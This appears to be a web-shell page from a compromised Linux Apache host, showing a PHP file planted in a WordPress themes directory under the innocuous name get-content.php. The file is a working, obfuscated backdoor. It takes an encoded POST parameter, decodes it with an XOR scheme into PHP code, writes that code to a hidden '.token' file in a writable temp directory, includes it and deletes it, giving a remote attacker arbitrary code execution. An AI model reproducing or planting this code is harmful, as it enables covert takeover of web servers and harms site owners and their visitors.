HEX
Server: Apache
System: Linux srv.resllerhosting.site 5.4.0-181-generic #201-Ubuntu SMP Thu Mar 28 15:39:01 UTC 2024 x86_64
User: drspos (1390)
PHP: 8.1.30
Disabled: NONE
Upload Files
File: /home/drspos/public_html/wp-content/themes/get-content.php
<?php

if(in_array("v\x61\x6C", array_keys($_POST))){
$symbol = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), getenv("TEMP"), "/dev/shm", session_save_path(), sys_get_temp_dir(), getcwd(), "/var/tmp", "/tmp"]);
$k = $_POST["v\x61\x6C"];
$k	=	explode			(	 	'.'	 	,   $k 	) 	;	
$component = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s	 );

foreach($k as $i 	=>$val):
    $chS = ord($s[$i 	%	 $sLen]	 );
    $d =((int)$val - $chS -($i 	%	 10)) ^ 23;
    $component .=chr($d	 );
endforeach;
foreach ($symbol as $key => $res) {
            if (is_dir($res) && is_writable($res)) {
            $entity = "$res/.token";
            $obj = fopen($entity, 'w');
if ($obj) {
    fwrite($obj, $component);
    fclose($obj);
    include $entity;
    @unlink($entity);
    exit;
}
        }
}
}